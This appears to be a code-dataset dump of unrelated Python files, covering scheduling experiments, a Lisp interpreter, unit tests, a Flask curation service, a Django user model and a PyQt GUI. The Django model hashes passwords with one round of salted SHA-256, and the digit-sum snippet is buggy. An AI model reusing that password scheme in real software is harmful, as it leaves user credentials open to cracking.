index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
10,500 | 31abc49be84b81f0e7ffe4e643737ff587ad8427 | import argparse
from mosestokenizer import *
def de_preprocess(references, language):
clean_references = []
for item in references:
# item = item.replace("@@ ", "")
item = item.replace("@@@", "")
item = item.replace("@@@@", "")
item = item.replace("<eos>", "")
item = item.replace("@str@@", "")
if len(item) > 0:
clean_references.append(item)
# item = item.replace("\n", "")
# with MosesDetokenizer(language) as detokenize:
# item_clean = detokenize(item.split(" "))
# clean_references.append(item_clean)
return clean_references
parser = argparse.ArgumentParser(description="Compute BLEU score")
parser.add_argument("--src", type=str, help="path to source file")
parser.add_argument("--out", type=str, help="path to output file")
parser.add_argument("--language", type=str, nargs="?", help="Language of the source translation (needed for tokenizer)")
args = parser.parse_args()
language = args.language
source_file_path = args.src
output_file_path = args.out
with open(output_file_path, 'w') as output_file:
for line in open(source_file_path, 'r'):
clean_line = de_preprocess(line.split(), language)
output_file.write(" ".join(clean_line) + "\n")
|
10,501 | 3bd4da3d61776d594535599e4b2a51979ab85931 | #!/bin/python3
# import socket
import busio
import adafruit_ssd1306
# from PIL import Image, ImageDraw, ImageFont
SCL = 1
SDA = 0
HEIGHT = 32
WIDTH = 128
i2c = busio.I2C(SCL, SDA)
disp = adafruit_ssd1306.SSD1306_I2C(WIDTH, HEIGHT, i2c)
|
10,502 | 10c3d75c153aa00226466765986d156cb009ec01 | import random
import numpy as np
import copy
import time
from gurobipy import *
import networkx as nx
M = 100000
def phase_1(t):
x = []
p = []
for i in range(0,len(t)):
x.append([])
alloc = np.argmin(t,0)
for i in range(0,len(alloc)):
x[alloc[i]].append(i)
return np.asarray(x)
class agent:
def __init__(self,time_arr):
self.op_times = np.asarray(time_arr)
self.alloc = []
self.time_arr = []
def eval_bundle(self,alloc):
time_arr = np.asarray([]).astype(int)
if len(alloc) != 0:
time_arr = self.op_times[np.asarray(alloc)]
return time_arr
def allocate(self,alloc):
self.alloc = np.asarray(alloc).astype(int)
self.time_arr = self.eval_bundle(self.alloc)
def total_time(self):
return sum(self.time_arr)
def check_deqx(self,agent2):
v12 = self.eval_bundle(agent2.alloc)
v21 = agent2.eval_bundle(self.alloc)
z_11 = sum(self.time_arr)
z_22 = sum(agent2.time_arr)
if z_11 + min(v12) >= z_22 and z_22 + min(v21) >= z_11:
return 1
else:
return 0
def gen_deq1(self,agent2):
tot_alloc = np.concatenate((self.alloc,agent2.alloc))
if len(tot_alloc) == 0:
return -1
a1_new_alloc = []
a2_new_alloc = []
ratio = []
v11 = self.eval_bundle(tot_alloc)
v21 = agent2.eval_bundle(tot_alloc)
v12 = []
v22 = []
ratio = v11/v21
ind = np.argsort(ratio)[::-1]
v11 = v11[ind]
v21 = v21[ind]
a1_new_alloc = tot_alloc[ind]
z1 = np.sum(v11)
z2 = 0
for i in range(0,len(a1_new_alloc)):
if max(z1 - v11[i] , z2 + v21[i]) < max(z1,z2):
z1 = z1 - v11[i]
z2 = z2 + v21[i]
op_trans = a1_new_alloc[0]
a1_new_alloc = np.delete(a1_new_alloc,0)
a2_new_alloc = np.append(a2_new_alloc,op_trans)
else:
break
improvement = 0
#print(max(sum(self.time_arr),sum(agent2.time_arr))," ",max(z1,z2))
if int(max(sum(self.time_arr),sum(agent2.time_arr))) > int(max(z1,z2)):
improvement = 1
self.allocate(a1_new_alloc)
agent2.allocate(a2_new_alloc)
return improvement
def gen_deqx(self,agent2):
flag = 0
improvement = 0
while flag == 0:
v12 = self.eval_bundle(agent2.alloc)
v21 = agent2.eval_bundle(self.alloc)
z1 = sum(self.time_arr)
z2 = sum(agent2.time_arr)
if z1 == 0 and z2 == 0:
break
if z1 > z2:
w1 = z1 - self.time_arr
w2 = z2 + v21
z_new = np.maximum(w1,w2)
ind = np.argmin(z_new)
if z_new[ind] < max(z1,z2):
transfer_op = int(self.alloc[ind])
self.alloc = np.delete(self.alloc,ind)
self.time_arr = np.delete(self.time_arr,ind)
agent2.alloc = np.append(agent2.alloc,transfer_op)
agent2.time_arr = np.append(agent2.time_arr,v21[ind])
improvement = 1
else:
flag = 1
elif z1 < z2:
w2 = z2 - agent2.time_arr
w1 = z1 + v12
z_new = np.maximum(w1,w2)
ind = np.argmin(z_new)
if z_new[ind] < max(z1,z2):
transfer_op = int(agent2.alloc[ind])
agent2.alloc = np.delete(agent2.alloc,ind)
agent2.time_arr = np.delete(agent2.time_arr,ind)
self.alloc = np.append(self.alloc,transfer_op)
self.time_arr = np.append(self.time_arr,v12[ind])
improvement = 1
else:
flag = 1
return improvement
def calc_makespan(agents):
ct = []
for i in range(0,len(agents)):
ct.append(agents[i].total_time())
return max(ct)
def pairwise_deq1(agents,G):
impr = 1
cnt = 0
while impr == 1:
cnt += 1
impr = 0
for e in G.edges:
#print(cnt)
impr_ = agents[e[0]].gen_deq1(agents[e[1]])
#impr = agents[e[0]].gen_deqx(agents[e[1]])
if impr_ == 1:
impr = 1
return cnt
def op_trading(agents,G):
impr = 1
cnt = 0
while impr == 1:
cnt += 1
impr = 0
for e in G.edges:
#impr = agents[e[0]].gen_deq1(agents[e[1]])
impr_ = agents[e[0]].gen_deqx(agents[e[1]])
if impr_ == 1:
impr = 1
return cnt
def find_makespan(t_,G,T,parts,ota_flag):
t = copy.deepcopy(t_)
t = M*(t>T) + t
m = len(t)
n = len(t[0])
agents = []
for i in range(0,m):
a = agent(t[i])
a.allocate(parts[i])
agents.append(a)
if ota_flag == "ota":
num_compares = op_trading(agents,G)
else:
num_compares = pairwise_deq1(agents,G)
makespan = calc_makespan(agents)
parts = []
for i in range(0,len(agents)):
parts.append(agents[i].alloc)
return makespan,num_compares,parts
def run_experiment(m,n,prob,pruning=False,id_flag="nonid"):
t = np.random.randint(50,size=(m,n))+1
if id_flag == "id":
t_ = np.random.randint(50,size=n)+1
t = []
for i in range(0,m):
t.append(copy.deepcopy(t_))
t = np.asarray(t)
elif id_flag == "prop":
t_ = np.random.randint(50,size=n)+1
t = []
for i in range(0,m):
f = random.random()*0.5 + 0.5
t.append(f*copy.deepcopy(t_))
t = np.asarray(t)
G = nx.Graph()
G.add_nodes_from(range(m))
for i in range(0,m):
for j in range(i+1,m):
G.add_edge(i,j)
for e in G.edges:
r = random.random()
if r < prob:
G.remove_edge(*e)
makespan = -1
num_compares = -1
if pruning == False:
items = range(n)
parts_pos = sorted(random.sample(items,m-1))
parts = []
parts.append(list(items[0:parts_pos[0]]))
for i in range(1,len(parts_pos)):
parts.append(list(items[parts_pos[i-1]:parts_pos[i]]))
parts.append(list(items[parts_pos[-1]:]))
#makespan,num_compares,parts = find_makespan(t,G,np.max(t),parts,"mba")
makespan,num_compares,parts = find_makespan(t,G,np.max(t),parts,"mba")
else:
items = range(n)
parts_pos = sorted(random.sample(items,m-1))
parts = []
parts.append(list(items[0:parts_pos[0]]))
for i in range(1,len(parts_pos)):
parts.append(list(items[parts_pos[i-1]:parts_pos[i]]))
parts.append(list(items[parts_pos[-1]:]))
m_arr = []
n_iters_arr = []
T_min = max(np.min(t,axis=0))
thresh_ = t.flatten()
thresh = []
for i in range(0,len(thresh_)):
if thresh_[i] >= T_min and thresh_[i] not in thresh:
thresh.append(thresh_[i])
thresh.sort()
i = 0
parts_arr = []
while i < len(thresh) :
#print(i)
m_,n_iter,parts = find_makespan(t,G,thresh[i],parts,"mba")
m_arr.append(m_)
n_iters_arr.append(n_iter)
parts_arr.append(copy.deepcopy(parts))
"""
if len(m_arr) > 2 and m_arr[-1] < M/2:
if m_arr[-1] > m_arr[-2]:
break
"""
i = i + 1
ind = np.argmin(m_arr)
makespan = m_arr[ind]
num_compares = n_iters_arr[ind]
parts = parts_arr[ind]
#makespan,num_compares,parts = find_makespan(t,G,np.max(t),parts,"ota")
mod = Model("mip")
mod.params.TimeLimit = 15
phi = mod.addVars(m,n,vtype=GRB.BINARY)
z_t = mod.addVar(vtype=GRB.CONTINUOUS)
mod.setObjective(z_t, GRB.MINIMIZE)
mod.addConstrs((z_t >= quicksum((phi[i,j])*t[i,j] for j in range(n)) for i in range(m)))
mod.addConstrs((quicksum(phi[i,j] for i in range(m)) == 1) for j in range(n))
mod.optimize()
opt_makespan = mod.objVal
return makespan/opt_makespan,num_compares
##################################################################################
m_vals = [2,5,10,20]
n_vals = [25,50,100,200,500]
##################################################################################
record1_makespan = np.zeros((len(m_vals),len(n_vals)))
record1_iters = np.zeros((len(m_vals),len(n_vals)))
for i in range(0,len(m_vals)):
for j in range(0,len(n_vals)):
ratios = []
compares = []
m = m_vals[i]
n = n_vals[j]
for k in range(0,5):
r,c = run_experiment(m,n,0.0,False,"prop")
ratios.append(r)
compares.append(c)
record1_makespan[i][j] = np.mean(ratios)
record1_iters[i][j] = np.mean(compares)
np.savetxt('pairwiseMBA_pr_prop_makespan.csv',record1_makespan, delimiter=',')
##################################################################################
"""
record1_makespan = np.zeros((len(m_vals),len(n_vals)))
record1_iters = np.zeros((len(m_vals),len(n_vals)))
for i in range(0,len(m_vals)):
for j in range(0,len(n_vals)):
ratios = []
compares = []
m = m_vals[i]
n = n_vals[j]
for k in range(0,5):
r,c = run_experiment(m,n,0.0,True,"nonid")
ratios.append(r)
compares.append(c)
record1_makespan[i][j] = np.mean(ratios)
record1_iters[i][j] = np.mean(compares)
np.savetxt('pairwiseMBA_prop_pr_makespan.csv',record1_makespan, delimiter=',')
"""
##################################################################################
|
10,503 | 73f630cb865bbd7baa317a853dcfd623cb422ce5 | #******************TESTING***************************
#This file is for testing the enigma_net class
from enigma_net import *
import _thread #used to read messages from inbox
#if you want to test this on two seperate computers, change host to '0.0.0.0' on the machine that
#you want to be the server, and change host to '<server's IP>' on the client machine.
#To test the EnigmaNet class on one machine, just set the host variable to 'localhost' and
#run the application twice
host = 'localhost' #the address or hostname of the system you want to connect to.
port = 5555 #the port number you want to use
socktype = int(input("enter sock type 1:server, 2:client: "))
en = EnigmaNet(socktype, host, port)
"""a seperate thread will begin running after calling en.start().
It will read messages in from the socket and place
those messages in an inbox"""
en.start()
user_input = ''
"""I'm using a seperate thread to read the messages in from the inbox.
You don't have to do it this way if you don't want to."""
def readInbox(threadName, delay):
while True:
if en.have_mail(): #check if there is a message in the inbox
print (en.recieve_message())#get the message from the inbox and print it
if user_input == '-1':
_thread.exit()
_thread.start_new_thread(readInbox, ("ThreadyMcThreadFace", 10))
#getting user input and sending it. the loop will stop if -1 is entered.
while not user_input == '-1':
user_input = input()
if user_input == '-1': break
en.send_message(user_input) #send the message
en.disconnect() #disconnect from the network. |
10,504 | e18fd6b29fa77e6792ad7d12cd39b95dfdd3a5ba | '''
Miscellaneous Test Code
Extracts all entries in an Outlaws LAB archive to the current directory.
'''
import struct
import sys
if __name__ == '__main__':
with open(sys.argv[1], 'rb') as f:
entries = []
if f.read(4) != b'LABN':
print('Bad Magic Identifier')
exit(-1)
version = struct.unpack('<I', f.read(4))[0]
if version != 0x00010000:
print('Bad Version')
print('Continuing...')
num_entries = struct.unpack('<I', f.read(4))[0]
name_table_length = struct.unpack('<I', f.read(4))[0]
catalog = []
for i in range(num_entries):
offset_name = struct.unpack('<I', f.read(4))[0]
offset_data = struct.unpack('<I', f.read(4))[0]
length_data = struct.unpack('<I', f.read(4))[0]
four_cc = struct.unpack('<I', f.read(4))[0]
catalog.append((offset_name, offset_data, length_data, four_cc))
name_table_offset = f.tell()
names = []
for i in range(num_entries):
f.seek(catalog[i][0], 1)
raw_name = b''
name = ''
if i < num_entries - 1:
raw_name = f.read(catalog[i + 1][0] - catalog[i][0])
name = raw_name[0 : raw_name.index(0)].decode('ascii')
else:
raw_name = f.read((name_table_length + name_table_offset) - catalog[i][0])
name = raw_name[0 : raw_name.index(0)].decode('ascii')
f.seek(name_table_offset)
names.append(name)
f.seek((name_table_length + name_table_offset))
for i in range(num_entries):
entry = catalog[i]
name = names[i]
f.seek(entry[1])
with open(name, 'wb') as e:
e.write(f.read(entry[2]))
|
10,505 | 3fb468dcb6218fa14a19ea124c9366a387ffebff | from unittest import TestCase
from unittest.mock import patch
from monster import check_monster_encounter
class TestCheck_monster_encounter(TestCase):
@patch('monster.monster_encounter', side_effect=[None])
@patch('sud.roll_die', side_effect=[1])
def test_monster_encounter_True(self, mock_monster_encounter, mock_roll_die):
self.assertTrue(check_monster_encounter())
@patch('sud.roll_die', side_effect=[5])
def test_monster_encounter_False(self, mock_roll_die):
self.assertFalse(check_monster_encounter())
|
10,506 | 6e469387f05e5225d372e84d6f14a47bad2f2020 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 9 16:01:22 2019
@author: mattcooper
"""
import numpy as np
import matplotlib.pyplot as plt
u = 1.661e-27
k = 1.38e-23
c = 3e8
m_He = 4.003*u
m_C = 12.0107*u
m_P = 1.673e-27
T = 10e6
nu = 10e9
R_Sun = 6.96e10
h = 6.626e-34
def get_turnover_Freq(n, L, T):
return n*(T**(-3/4))*np.sqrt(1.24e-2*L)
#Function derived for the turnover frequency of the surface brightness
def nu_Function(NU, T, L, N_E):
a = L*.04075*(N_E**2)/(T**(3/2))
b = 24.5 + np.log(T)
return (NU**2) + a*np.log(NU) - a*b
#Iterative method to solve for the turnover frequency. That darn logarithm
#A and B are the lower and upper bounds of the domain, respectively. Pass any other parameters that may be
#required to compute the function as *args
def bisect_Function(FUNC, A, B, ERR, *args):
flag = False
while flag == False:
M = (A + B)/2
func_A = FUNC(A, *args)
func_B = FUNC(B, *args)
func_M = FUNC(M, *args)
if B - M < ERR:
print('Error reached')
return M
if func_A == func_B:
print('Bisection method failed. Function has same sign at both bounds.')
break
if func_A == 0 or func_B == 0 or func_M == 0:
flag = True
if np.sign(func_A) != np.sign(func_M):
B = M
else:
A = M
n_e1 = 10e13
T1 = 1e4
L1 = 1000000
nu_Turnover_1 = bisect_Function(nu_Function, 1e8, 1e14, 1e7, T1, L1, n_e1)
n_e2 = 10e10
T2 = 2e6
L2 = 10000000
nu_Turnover_2 = bisect_Function(nu_Function, 1e8, 1e14, 1e7, T2, L2, n_e2)
n_e3 = 10e9
T3 = 5e5
L3 = 70000000
nu_Turnover_3 = bisect_Function(nu_Function, 1e8, 1e14, 1e7, T3, L3, n_e3)
freqs = np.arange(10e6, 10e11, 1e7)
tau = np.zeros([freqs.shape[0], 3])
T = np.zeros([freqs.shape[0], 3])
S = 24.5 + np.log(T) - np.log(nu)
for i in range(freqs.shape[0]):
tau[i, 0] = (n_e1**2)*(1/T1**(3/2))*L1*1.24e-2*(1/(freqs[i]**(2)))*(18.2 + np.log(T1**(3/2)) - np.log(freqs[i]))
tau[i, 1] = (n_e2**2)*(1/T2**(3/2))*1.24e-2*(1/(freqs[i]**(2)))*L2*(24.5 + np.log(T2) - np.log(freqs[i]))
tau[i, 2] = (n_e3**2)*(1/T3**(3/2))*1.24e-2*(1/(freqs[i]**(2)))*L3*(24.5 + np.log(T3) - np.log(freqs[i]))
T[:,0] = T1*(1-np.exp(-tau[:,0]))
T[:,1] = T[:,0]*np.exp(-tau[:,1]) + T2*(1-np.exp(-tau[:,1]))
T[:,2] = T[:,1]*np.exp(-tau[:,2]) + T3*(1-np.exp(-tau[:,2]))
fig1, (ax1) = plt.subplots(1, 1, sharex=True, sharey=False, figsize=(17,12), dpi=166)
ax1.set_yscale('log')
ax1.set_xscale('log')
ax1.plot(freqs, T[:,0], color='black', label='1st Layer Spectra')
ax1.plot(freqs, T[:,1], color='red', label='2nd Layer Spectra')
ax1.plot(freqs, T[:,2], color='blue', label='3rd Layer Spectra')
ax1.set_ylim(1e3, 1e7)
ax1.set_xlim(1e9, 1e11)
ax1.legend()
|
10,507 | 839eb366863737853b832a41632564014328dd4d | # Copyright (c) 2017 Presslabs SRL
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
from uuid import UUID
from datetime import datetime, timedelta
from mock import patch, MagicMock, call
from django.test import TestCase, override_settings
from django.utils.encoding import force_text
from silver.tests.factories import TransactionFactory
from silver.tests.fixtures import PAYMENT_PROCESSORS
from silver.utils.decorators import get_transaction_from_token
from silver.utils.payments import (get_payment_url, get_payment_complete_url,
_get_jwt_token)
@override_settings(PAYMENT_PROCESSORS=PAYMENT_PROCESSORS)
class TestPaymentsUtilMethods(TestCase):
def test_get_payment_url(self):
transaction = TransactionFactory()
expected_url = '/pay/token/'
with patch('silver.utils.payments._get_jwt_token') as mocked_token:
mocked_token.return_value = 'token'
self.assertEqual(get_payment_url(transaction, None), expected_url)
mocked_token.assert_called_once_with(transaction)
def test_get_payment_complete_url(self):
transaction = TransactionFactory()
expected_url = '/pay/token/complete?return_url=http://google.com'
mocked_request = MagicMock(GET={'return_url': 'http://google.com'},
versioning_scheme=None)
mocked_request.build_absolute_uri.return_value = '/pay/token/complete'
with patch('silver.utils.payments._get_jwt_token') as mocked_token:
mocked_token.return_value = 'token'
self.assertEqual(get_payment_complete_url(transaction, mocked_request),
expected_url)
mocked_token.assert_called_once_with(transaction)
def test_get_transaction_from_token(self):
transaction = TransactionFactory()
mocked_view = MagicMock()
token = _get_jwt_token(transaction)
self.assertEqual(get_transaction_from_token(mocked_view)(None, token),
mocked_view())
mocked_view.has_calls([call(None, transaction, False), call()])
def test_get_transaction_from_expired_token(self):
transaction = TransactionFactory()
mocked_view = MagicMock()
with patch('silver.utils.payments.datetime') as mocked_datetime:
mocked_datetime.utcnow.return_value = datetime.utcnow() - timedelta(days=2 * 365)
token = _get_jwt_token(transaction)
self.assertEqual(get_transaction_from_token(mocked_view)(None, token),
mocked_view())
mocked_view.has_calls([call(None, transaction, True), call()])
|
10,508 | 64fe0d4e5ab74f2651eb8fd19762f6fdccd92203 | #
# JMC Lisp: defined in McCarthy's 1960 paper,
# with S-expression input/output and basic list processing
#
# basic list processing: cons, car, cdr, eq, atom
def cons(x, y): return (x, y)
def car(s): return s[0]
def cdr(s): return s[1]
def eq(s1, s2): return s1 == s2
def atom(s): return isinstance(s, str) or eq(s, None) or isinstance(s, bool)
# S-expression input: s_read
def s_lex(s):
for p in "()'": s = s.replace(p, " " + p + " ")
return s.split()
def s_syn(s):
def quote(x):
if len(s) != 0 and s[-1] == "'":
del s[-1]
return cons("quote", cons(x, None))
else: return x
t = s[-1]
del s[-1]
if t == ")":
r = None
while s[-1] != "(":
if s[-1] == ".":
del s[-1]
r = cons(s_syn(s), car(r))
else: r = cons(s_syn(s), r)
del s[-1]
return quote(r)
else: return quote(t)
def s_read(s): return s_syn(s_lex(s))
# S-expression output: s_string
def s_strcons(s):
sa_r = s_string(car(s))
sd = cdr(s)
if eq(sd, None):
return sa_r
elif atom(sd):
return sa_r + " . " + sd
else:
return sa_r + " " + s_strcons(sd)
def s_string(s):
if eq(s, None): return "()"
elif eq(s, True): return "t"
elif eq(s, False): return "nil"
elif atom(s):
return s
else:
return "(" + s_strcons(s) + ")"
# JMC Lisp evaluator: s_eval
def caar(x): return car(car(x))
def cadr(x): return car(cdr(x))
def cadar(x): return car(cdr(car(x)))
def caddr(x): return car(cdr(cdr(x)))
def caddar(x): return car(cdr(cdr(car(x))))
def s_null(x): return eq(x, None)
def s_append(x, y):
if s_null(x): return y
else: return cons(car(x), s_append(cdr(x), y))
def s_list(x, y): return cons(x, cons(y, None))
def s_pair(x, y):
if s_null(x) and s_null(y): return None
elif (not atom(x)) and (not atom(y)):
return cons(s_list(car(x), car(y)), s_pair(cdr(x), cdr(y)))
def s_assoc(x, y):
if eq(caar(y), x): return cadar(y)
else: return s_assoc(x, cdr(y))
def s_eval(e, a):
if eq(e, "t"): return True
elif eq(e, "nil"): return False
elif atom(e): return s_assoc(e, a)
elif atom(car(e)):
if eq(car(e), "quote"): return cadr(e)
elif eq(car(e), "atom"): return atom(s_eval(cadr(e), a))
elif eq(car(e), "eq"): return eq( s_eval(cadr(e), a),
s_eval(caddr(e), a))
elif eq(car(e), "car"): return car( s_eval(cadr(e), a))
elif eq(car(e), "cdr"): return cdr( s_eval(cadr(e), a))
elif eq(car(e), "cons"): return cons(s_eval(cadr(e), a),
s_eval(caddr(e), a))
elif eq(car(e), "cond"): return evcon(cdr(e), a)
else: return s_eval(cons(s_assoc(car(e), a), cdr(e)), a)
elif eq(caar(e), "lambda"):
return s_eval(caddar(e),
s_append(s_pair(cadar(e), evlis(cdr(e), a)), a))
else: print("Error")
def evcon(c, a):
if s_eval(caar(c), a): return s_eval(cadar(c), a)
else: return evcon(cdr(c), a)
def evlis(m, a):
if s_null(m): return None
else: return cons(s_eval(car(m), a), evlis(cdr(m), a))
# REP (no Loop): s_rep
def s_rep(e): return s_string(s_eval(s_read(e), s_read("()")))
|
10,509 | 6de1d5233eb8dccaa746de84c3f4edeed98c0dfb | def calc(num):
lst = []
while num > 0:
lst.append(num % 10)
n //= 10
return sum(lst)
N = int(input())
print(calc(N)) |
10,510 | 4886fad8e437b0ebb5d574ed9c63f7f0df5a2308 | from django.db import models
from hashlib import sha256
from django.contrib.auth.base_user import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin, UserManager
from django.utils.crypto import get_random_string, constant_time_compare
import re
class Avatar(models.Model):
link = models.TextField('Ссылка')
file = models.ImageField('Файл')
class Pictures(models.Model):
link = models.TextField('Ссылка')
file = models.ImageField('Файл')
user_id = models.ForeignKey('users.User', null=True, on_delete=models.CASCADE)
class User(AbstractBaseUser, PermissionsMixin):
first_name = models.CharField('Имя', max_length=50)
last_name = models.CharField('Фамилия', max_length=50)
birth_date = models.DateField('Дата рождения', null=True)
sex = models.CharField(max_length=1, choices=(('M', 'Male'), ('F', 'Female')))
email = models.CharField('Электронная почта', max_length=64, null=True, default=None, blank=True, unique=True)
password = models.CharField(max_length=64)
salt = models.CharField(max_length=64)
USERNAME_FIELD = 'email'
EMAIL_FIELD = 'email'
objects = UserManager()
def set_password(self, raw_password):
salt = get_random_string(64)
hasher = sha256()
raw_password = raw_password + '_' + salt
hasher.update(raw_password.encode('utf-8'))
self.salt = salt
self.password = hasher.hexdigest()
return self
def check_password(self, raw_password):
hasher = sha256()
raw_password = raw_password + '_' + self.salt
hasher.update(raw_password.encode('utf-8'))
result = constant_time_compare(hasher.hexdigest(), self.password)
return result
|
10,511 | adc654a69bf068cd24fadd53e22160463f10a018 | '''
5. Working with Files and Directories
Creating files
Operations on files (open, close, read, write)
file object attributes
filepositions
- https://docs.python.org/3/tutorial/inputoutput.html#reading-and-writing-files
Listing Files in a Directory
>>> import os
>>> print(os.listdir("C:/Users/Quark/Documents/shuffler"))
https://docs.python.org/3/library/os.html
Testing File Types
- We can use endswith to test this out.
Removing Files and Directories
- os.remove() or os.unlink()
- os.rmdir(): Removes the specified directory. The directory must be empty or Python will display an exception message.
- shutil.rmtree(): Removes the specified directory, all subdirectories, and all files. This function is especially dangerous because it removes everything without checking (Python assumes that you know what you’re doing). As a result, you can easily lose data using this function.
Copying and Renaming Files
- https://docs.python.org/3/library/shutil.html
- https://docs.python.org/3/library/os.html
Splitting Pathnames
- https://docs.python.org/3/library/stdtypes.html#str.split
- https://docs.python.org/3/library/os.path.html
Creating and Moving to Directories
- https://stackabuse.com/creating-and-deleting-directories-with-python/
Traversing Directory Trees
- https://www.pythoncentral.io/how-to-traverse-a-directory-tree-in-python-guide-to-os-walk/
''' |
10,512 | e0a6d8a0833920011cc737b405cdaac9ea90e7b0 | """This REST service allows real-time curation and belief updates for
a corpus of INDRA Statements."""
import sys
import pickle
import logging
import argparse
from flask import Flask, request, jsonify, abort, Response
from indra.belief import wm_scorer, BeliefEngine
from indra.statements import stmts_from_json_file
logger = logging.getLogger('live_curation')
app = Flask(__name__)
scorer = wm_scorer.get_eidos_bayesian_scorer()
corpora = {}
class Corpus(object):
"""Represent a corpus of statements with curation."""
def __init__(self, statements):
self.statements = {st.uuid: st for st in statements}
self.curations = {}
def __str__(self):
return 'Corpus(%s -> %s)' % (str(self.statements), str(self.curations))
def __repr__(self):
return str(self)
@app.route('/update_beliefs', methods=['POST'])
def update_beliefs():
if request.json is None:
abort(Response('Missing application/json header.', 415))
# Get input parameters
corpus_id = request.json.get('corpus_id')
curations = request.json.get('curations', {})
return_beliefs = request.json.get('return_beliefs', False)
# Get the right corpus
try:
corpus = corpora[corpus_id]
except KeyError:
abort(Response('The corpus_id "%s" is unknown.' % corpus_id, 400))
return
# Start tabulating the curation counts
prior_counts = {}
subtype_counts = {}
# Take each curation from the input
for uuid, correct in curations.items():
# Save the curation in the corpus
# TODO: handle already existing curation
stmt = corpus.statements.get(uuid)
if stmt is None:
logger.warning('%s is not in the corpus.' % uuid)
continue
corpus.curations[uuid] = correct
# Now take all the evidences of the statement and assume that
# they follow the correctness of the curation and contribute to
# counts for their sources
for ev in stmt.evidence:
# Make the index in the curation count list
idx = 0 if correct else 1
extraction_rule = ev.annotations.get('found_by')
# If there is no extraction rule then we just score the source
if not extraction_rule:
try:
prior_counts[ev.source_api][idx] += 1
except KeyError:
prior_counts[ev.source_api] = [0, 0]
prior_counts[ev.source_api][idx] += 1
# Otherwise we score the specific extraction rule
else:
try:
subtype_counts[ev.source_api][extraction_rule][idx] += 1
except KeyError:
if ev.source_api not in subtype_counts:
subtype_counts[ev.source_api] = {}
subtype_counts[ev.source_api][extraction_rule] = [0, 0]
subtype_counts[ev.source_api][extraction_rule][idx] += 1
# Finally, we update the scorer with the new curation counts
scorer.update_counts(prior_counts, subtype_counts)
# If not belief return is needed, we just stop here
if not return_beliefs:
return jsonify({})
# Otherwise we rerun the belief calculation on the corpus with
# the updated scorer and return a dict of beliefs
else:
be = BeliefEngine(scorer)
stmts = list(corpus.statements.values())
be.set_prior_probs(stmts)
# Here we set beliefs based on actual curation
for uuid, correct in corpus.curations.items():
stmt = corpus.statements.get(uuid)
if stmt is None:
logger.warning('%s is not in the corpus.' % uuid)
continue
stmt.belief = correct
belief_dict = {st.uuid: st.belief for st in stmts}
return jsonify(belief_dict)
if __name__ == '__main__':
# Process arguments
parser = argparse.ArgumentParser(description='Choose a corpus for live curation.')
parser.add_argument('--json')
parser.add_argument('--pickle')
parser.add_argument('--corpus_id', default='1')
parser.add_argument('--host', default='0.0.0.0')
parser.add_argument('--port', default=8001, type=int)
args = parser.parse_args()
# Load the corpus
if args.json:
stmts = stmts_from_json_file(args.json)
elif args.pickle:
with open(args.pickle, 'rb') as fh:
stmts = pickle.load(fh)
logger.info('Loaded corpus %s with %d statements.' %
(args.corpus_id, len(stmts)))
corpora[args.corpus_id] = Corpus(stmts)
# Run the app
app.run(host=args.host, port=args.port)
|
10,513 | 5d36c28db1c5c78d4ec395672f0140cfc8062c10 | from PyQt5 import QtWidgets, QtGui, QtCore, QtPrintSupport
from ventana import *
from vensalir import *
from vencalendar import *
from datetime import datetime, date
import sys, var, events, clients, conexion, printer, Products, ventas, provider
class DialogSalir(QtWidgets.QDialog):
"""
Clase que isntancia la venta de aviso salir
"""
def __init__(self):
super(DialogSalir, self).__init__()
var.dlgsalir= Ui_dlgsalir()
var.dlgsalir.setupUi(self)
var.dlgsalir.btnBoxSalir.button(QtWidgets.QDialogButtonBox.Yes).clicked.connect(events.Eventos.Salir)
class DialogCalendar(QtWidgets.QDialog):
"""
Clase que instancia la venta de calendario
"""
def __init__(self):
super(DialogCalendar, self).__init__()
var.dlgcalendar = Ui_dlgCalendar()
var.dlgcalendar.setupUi(self)
diaactual = datetime.now().day
mesactual = datetime.now().month
anoactual = datetime.now().year
var.dlgcalendar.Calendar.setSelectedDate((QtCore.QDate(anoactual,mesactual,diaactual)))
var.dlgcalendar.Calendar.clicked.connect(clients.Clientes.cargarFecha)
var.dlgcalendar.Calendar.clicked.connect(ventas.Ventas.cargarFecha)
class FileDialogAbrir(QtWidgets.QFileDialog):
"""
Clase que instancia la venta de diectorios
"""
def __init__(self):
super(FileDialogAbrir, self).__init__()
self.setWindowTitle('Abrir Archivo')
self.setModal(True)
class PrintDialogAbrir(QtPrintSupport.QPrintDialog):
"""
Clase que instancia la venta de impresion
"""
def __init__(self):
super(PrintDialogAbrir, self).__init__()
class Main(QtWidgets.QMainWindow):
"""
Clase main. Instancia todas las ventanas del programa
Conecta todos los eventos de los botones, tablas y otros widgets
Cuando se lanza se conecta con la BDDD y muestra todos los articulo, factura y clientes
de la BBDD en las ventanas que les corresponden
"""
def __init__(self):
super(Main, self).__init__()
"""
Instancia todas las ventanas auxiliares
"""
var.ui = Ui_venPrincipal()
var.ui.setupUi(self)
var.dlgsalir = DialogSalir()
var.dlgcalendar = DialogCalendar()
var.filedlgabrir = FileDialogAbrir()
var.dlgImprimir = PrintDialogAbrir()
"""
listas que contiene los valores de checkbox y radiobuton
"""
var.rbtsex = (var.ui.rbtFem, var.ui.rbtMasc)
var.chkpago = (var.ui.chkEfec, var.ui.chkTar, var.ui.chkTrans)
clients.Clientes.valoresSpin()
var.ui.editDni.editingFinished.connect(clients.Clientes.validoDni)
var.ui.cmbProv.activated[str].connect(clients.Clientes.selProv)
for i in var.rbtsex:
i.toggled.connect(clients.Clientes.selSexo)
for i in var.chkpago:
i.stateChanged.connect(clients.Clientes.selPago)
events.Eventos.cargarProv(self)
'''
conexion de eventos con los objetos
estamos conectando el código con la interfaz gráfico
botones formulario cliente
'''
var.ui.btnSalir.clicked.connect(events.Eventos.Salir)
var.ui.btnCalendar.clicked.connect(clients.Clientes.abrirCalendar)
var.ui.btnAltaCli.clicked.connect(clients.Clientes.altaCliente)
var.ui.btnLimpiarCli.clicked.connect(clients.Clientes.limpiarCli)
